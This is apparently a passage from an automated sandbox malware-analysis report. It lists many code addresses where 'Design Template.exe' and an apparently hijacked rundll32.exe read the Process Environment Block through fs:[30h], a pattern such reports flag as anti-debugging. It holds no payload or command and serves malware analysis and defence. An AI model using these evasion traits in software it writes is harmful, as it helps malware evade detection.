        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9C450 mov eax, dword ptr fs:[00000030h]4_2_00A9C450
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9C450 mov eax, dword ptr fs:[00000030h]4_2_00A9C450
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD05AC mov eax, dword ptr fs:[00000030h]4_2_00AD05AC
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD05AC mov eax, dword ptr fs:[00000030h]4_2_00AD05AC
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A335A1 mov eax, dword ptr fs:[00000030h]4_2_00A335A1
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A31DB5 mov eax, dword ptr fs:[00000030h]4_2_00A31DB5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A31DB5 mov eax, dword ptr fs:[00000030h]4_2_00A31DB5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A31DB5 mov eax, dword ptr fs:[00000030h]4_2_00A31DB5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32581 mov eax, dword ptr fs:[00000030h]4_2_00A32581
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32581 mov eax, dword ptr fs:[00000030h]4_2_00A32581
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32581 mov eax, dword ptr fs:[00000030h]4_2_00A32581
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32581 mov eax, dword ptr fs:[00000030h]4_2_00A32581
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h]4_2_00A02D8A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h]4_2_00A02D8A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h]4_2_00A02D8A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h]4_2_00A02D8A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h]4_2_00A02D8A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3FD9B mov eax, dword ptr fs:[00000030h]4_2_00A3FD9B
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3FD9B mov eax, dword ptr fs:[00000030h]4_2_00A3FD9B
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]4_2_00A1D5E0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]4_2_00A1D5E0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]4_2_00ACFDE2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]4_2_00ACFDE2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]4_2_00ACFDE2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]4_2_00ACFDE2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AB8DF1 mov eax, dword ptr fs:[00000030h]4_2_00AB8DF1
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h]4_2_00A86DC9
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h]4_2_00A86DC9
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h]4_2_00A86DC9
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86DC9 mov ecx, dword ptr fs:[00000030h]4_2_00A86DC9
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h]4_2_00A86DC9
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h]4_2_00A86DC9
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0AD30 mov eax, dword ptr fs:[00000030h]4_2_00A0AD30
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACE539 mov eax, dword ptr fs:[00000030h]4_2_00ACE539
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A34D3B mov eax, dword ptr fs:[00000030h]4_2_00A34D3B
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A34D3B mov eax, dword ptr fs:[00000030h]4_2_00A34D3B
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A34D3B mov eax, dword ptr fs:[00000030h]4_2_00A34D3B
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD8D34 mov eax, dword ptr fs:[00000030h]4_2_00AD8D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A8A537 mov eax, dword ptr fs:[00000030h]4_2_00A8A537
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2C577 mov eax, dword ptr fs:[00000030h]4_2_00A2C577
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2C577 mov eax, dword ptr fs:[00000030h]4_2_00A2C577
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A43D43 mov eax, dword ptr fs:[00000030h]4_2_00A43D43
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A83540 mov eax, dword ptr fs:[00000030h]4_2_00A83540
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A27D50 mov eax, dword ptr fs:[00000030h]4_2_00A27D50
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]4_2_00AD0EA5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]4_2_00AD0EA5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]4_2_00AD0EA5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A846A7 mov eax, dword ptr fs:[00000030h]4_2_00A846A7
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9FE87 mov eax, dword ptr fs:[00000030h]4_2_00A9FE87
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A316E0 mov ecx, dword ptr fs:[00000030h]4_2_00A316E0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A176E2 mov eax, dword ptr fs:[00000030h]4_2_00A176E2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A48EC7 mov eax, dword ptr fs:[00000030h]4_2_00A48EC7
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ABFEC0 mov eax, dword ptr fs:[00000030h]4_2_00ABFEC0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A336CC mov eax, dword ptr fs:[00000030h]4_2_00A336CC
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD8ED6 mov eax, dword ptr fs:[00000030h]4_2_00AD8ED6
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0E620 mov eax, dword ptr fs:[00000030h]4_2_00A0E620
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ABFE3F mov eax, dword ptr fs:[00000030h]4_2_00ABFE3F
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0C600 mov eax, dword ptr fs:[00000030h]4_2_00A0C600
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0C600 mov eax, dword ptr fs:[00000030h]4_2_00A0C600
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0C600 mov eax, dword ptr fs:[00000030h]4_2_00A0C600
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A38E00 mov eax, dword ptr fs:[00000030h]4_2_00A38E00
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1608 mov eax, dword ptr fs:[00000030h]4_2_00AC1608
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3A61C mov eax, dword ptr fs:[00000030h]4_2_00A3A61C
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3A61C mov eax, dword ptr fs:[00000030h]4_2_00A3A61C
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1766D mov eax, dword ptr fs:[00000030h]4_2_00A1766D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h]4_2_00A2AE73
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h]4_2_00A2AE73
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h]4_2_00A2AE73
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h]4_2_00A2AE73
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h]4_2_00A2AE73
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h]4_2_00A17E41
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h]4_2_00A17E41
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h]4_2_00A17E41
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h]4_2_00A17E41
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h]4_2_00A17E41
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h]4_2_00A17E41
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACAE44 mov eax, dword ptr fs:[00000030h]4_2_00ACAE44
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACAE44 mov eax, dword ptr fs:[00000030h]4_2_00ACAE44
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A18794 mov eax, dword ptr fs:[00000030h]4_2_00A18794
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A87794 mov eax, dword ptr fs:[00000030h]4_2_00A87794
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A87794 mov eax, dword ptr fs:[00000030h]4_2_00A87794
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A87794 mov eax, dword ptr fs:[00000030h]4_2_00A87794
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A437F5 mov eax, dword ptr fs:[00000030h]4_2_00A437F5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A04F2E mov eax, dword ptr fs:[00000030h]4_2_00A04F2E
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A04F2E mov eax, dword ptr fs:[00000030h]4_2_00A04F2E
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3E730 mov eax, dword ptr fs:[00000030h]4_2_00A3E730
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD070D mov eax, dword ptr fs:[00000030h]4_2_00AD070D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD070D mov eax, dword ptr fs:[00000030h]4_2_00AD070D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3A70E mov eax, dword ptr fs:[00000030h]4_2_00A3A70E
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3A70E mov eax, dword ptr fs:[00000030h]4_2_00A3A70E
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2F716 mov eax, dword ptr fs:[00000030h]4_2_00A2F716
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9FF10 mov eax, dword ptr fs:[00000030h]4_2_00A9FF10
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9FF10 mov eax, dword ptr fs:[00000030h]4_2_00A9FF10
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1FF60 mov eax, dword ptr fs:[00000030h]4_2_00A1FF60
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD8F6A mov eax, dword ptr fs:[00000030h]4_2_00AD8F6A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1EF40 mov eax, dword ptr fs:[00000030h]4_2_00A1EF40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BA44B mov eax, dword ptr fs:[00000030h]14_2_044BA44B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451C450 mov eax, dword ptr fs:[00000030h]14_2_0451C450
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451C450 mov eax, dword ptr fs:[00000030h]14_2_0451C450
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A746D mov eax, dword ptr fs:[00000030h]14_2_044A746D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0455740D mov eax, dword ptr fs:[00000030h]14_2_0455740D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0455740D mov eax, dword ptr fs:[00000030h]14_2_0455740D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0455740D mov eax, dword ptr fs:[00000030h]14_2_0455740D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506C0A mov eax, dword ptr fs:[00000030h]14_2_04506C0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506C0A mov eax, dword ptr fs:[00000030h]14_2_04506C0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506C0A mov eax, dword ptr fs:[00000030h]14_2_04506C0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506C0A mov eax, dword ptr fs:[00000030h]14_2_04506C0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BBC2C mov eax, dword ptr fs:[00000030h]14_2_044BBC2C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04558CD6 mov eax, dword ptr fs:[00000030h]14_2_04558CD6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506CF0 mov eax, dword ptr fs:[00000030h]14_2_04506CF0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506CF0 mov eax, dword ptr fs:[00000030h]14_2_04506CF0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506CF0 mov eax, dword ptr fs:[00000030h]14_2_04506CF0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045414FB mov eax, dword ptr fs:[00000030h]14_2_045414FB
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449849B mov eax, dword ptr fs:[00000030h]14_2_0449849B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C3D43 mov eax, dword ptr fs:[00000030h]14_2_044C3D43
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04503540 mov eax, dword ptr fs:[00000030h]14_2_04503540
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A7D50 mov eax, dword ptr fs:[00000030h]14_2_044A7D50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AC577 mov eax, dword ptr fs:[00000030h]14_2_044AC577
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AC577 mov eax, dword ptr fs:[00000030h]14_2_044AC577
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04558D34 mov eax, dword ptr fs:[00000030h]14_2_04558D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0450A537 mov eax, dword ptr fs:[00000030h]14_2_0450A537
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454E539 mov eax, dword ptr fs:[00000030h]14_2_0454E539
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B4D3B mov eax, dword ptr fs:[00000030h]14_2_044B4D3B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B4D3B mov eax, dword ptr fs:[00000030h]14_2_044B4D3B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B4D3B mov eax, dword ptr fs:[00000030h]14_2_044B4D3B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448AD30 mov eax, dword ptr fs:[00000030h]14_2_0448AD30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h]14_2_04506DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h]14_2_04506DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h]14_2_04506DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506DC9 mov ecx, dword ptr fs:[00000030h]14_2_04506DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h]14_2_04506DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h]14_2_04506DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04538DF1 mov eax, dword ptr fs:[00000030h]14_2_04538DF1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449D5E0 mov eax, dword ptr fs:[00000030h]14_2_0449D5E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449D5E0 mov eax, dword ptr fs:[00000030h]14_2_0449D5E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h]14_2_0454FDE2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h]14_2_0454FDE2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h]14_2_0454FDE2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h]14_2_0454FDE2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h]14_2_04482D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h]14_2_04482D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h]14_2_04482D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h]14_2_04482D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h]14_2_04482D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h]14_2_044B2581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h]14_2_044B2581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h]14_2_044B2581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h]14_2_044B2581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BFD9B mov eax, dword ptr fs:[00000030h]14_2_044BFD9B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BFD9B mov eax, dword ptr fs:[00000030h]14_2_044BFD9B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B35A1 mov eax, dword ptr fs:[00000030h]14_2_044B35A1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045505AC mov eax, dword ptr fs:[00000030h]14_2_045505AC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045505AC mov eax, dword ptr fs:[00000030h]14_2_045505AC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B1DB5 mov eax, dword ptr fs:[00000030h]14_2_044B1DB5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B1DB5 mov eax, dword ptr fs:[00000030h]14_2_044B1DB5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B1DB5 mov eax, dword ptr fs:[00000030h]14_2_044B1DB5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h]14_2_04497E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h]14_2_04497E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h]14_2_04497E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h]14_2_04497E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h]14_2_04497E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h]14_2_04497E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454AE44 mov eax, dword ptr fs:[00000030h]14_2_0454AE44
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454AE44 mov eax, dword ptr fs:[00000030h]14_2_0454AE44
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449766D mov eax, dword ptr fs:[00000030h]14_2_0449766D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h]14_2_044AAE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h]14_2_044AAE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h]14_2_044AAE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h]14_2_044AAE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h]14_2_044AAE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448C600 mov eax, dword ptr fs:[00000030h]14_2_0448C600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448C600 mov eax, dword ptr fs:[00000030h]14_2_0448C600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448C600 mov eax, dword ptr fs:[00000030h]14_2_0448C600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B8E00 mov eax, dword ptr fs:[00000030h]14_2_044B8E00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BA61C mov eax, dword ptr fs:[00000030h]14_2_044BA61C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BA61C mov eax, dword ptr fs:[00000030h]14_2_044BA61C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541608 mov eax, dword ptr fs:[00000030h]14_2_04541608
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448E620 mov eax, dword ptr fs:[00000030h]14_2_0448E620
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0453FE3F mov eax, dword ptr fs:[00000030h]14_2_0453FE3F
